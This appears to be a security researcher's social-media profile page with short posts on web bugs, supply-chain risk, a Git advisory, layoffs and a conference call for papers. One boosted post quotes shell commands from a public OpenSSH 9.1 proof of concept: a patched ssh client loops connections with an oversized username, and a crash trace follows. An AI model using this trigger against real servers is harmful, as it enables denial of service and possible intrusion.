Profile for joern
About joern
Fields
- Website
- https://0day.click
- Threema
- https://threema.id/K8J68WTX
Bio
Your mom's favorite hacker!
My other account is @joernchen
- Joined
- Posts
- 687
- Followed by
- 1129
- Following
- 261
Stats
Recent public posts
exclude boostsUnpopular take: .zip domains were a marketing gag targeting security people.
We found some injection bugs in Go's html/template. That's to say stdlib-level XSS 
Stuff one finds buried in a shelf when moving β¦.
OR: Hot Single Sign Ons in your Collision Domain!
Hot Take: a lot of the "supply chain insecurity" news stories are not problems with the supply chain. So what if you managed to upload some crapware RAT to PyPi? No one will even use your malicious package ever. Even if you tried typosquating the package, the odds are still low that anyone important or a large chunk of the community would accidentally use your typosquated malicious package . Real supply chain issues are when a legitimate and *popular link in the supply chain (aka a popular library used by many other projects) becomes compromised.
This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92
Here I was thinking this bug was hopeless and they one-line it without writing new code:
$ cp -i /usr/bin/ssh ./ssh
$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh
$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
"$user:$user" 192.168.56.123 ;done
...
#1 0x4141414141414141 in ?? ()
Happy Valentine's Day!
I've got a little something for you all right here https://github.com/git/git/security/advisories/GHSA-r87m-v37r-cwfh
π Patch your Gits π
IDK but all those AI prompt injections like
seem to rely on in-band signalling which could have been avoided at design time by having separate channels for configuration and user input. But instead the 70s are calling and want their cereal whistles back
βββββββββββββββ 10%
β Are there any standard data formats for asset/attack surface related information? Something like Structured Threat Information Expression (STIX) but for attack surface mapping that other tools and systems can consume.
Stuff we found on GitHub with no warranty or support, yet decided to underpin our entire product on - chain attacks.
Sometimes you just need to look at the right spot and have a good guts feeling to find vulns.
https://about.gitlab.com/blog/2023/01/24/git-security-audit/
speculation about layoffs and security posture
It's going to be interesting to see how the layoffs will impact security. According to birbsite and Mastodon, already some InfoSec people have been hit by layoffs. Fewer people means things stay broken longer, incidents take longer to respond to, etc. Meanwhile, hackers and ransomware gangs do not have to deal with layoffs... Guess who's going to have the competitive advantage?
CALL FOR PAPERS T2β23
Tired of your bosses suspecting conference trips to exotic locations being just a ploy to partake in Security Vacation Club? Prove them wrong by coming to Helsinki, Finland on May 4-5 2023! Guaranteed lack of sunburn, good potential for rain or slush. In case of great spring weather, though, no money back.
CFP and registration both open. Read further if still unsure:
https://t2.fi/2023/01/19/call-for-papers-2023/
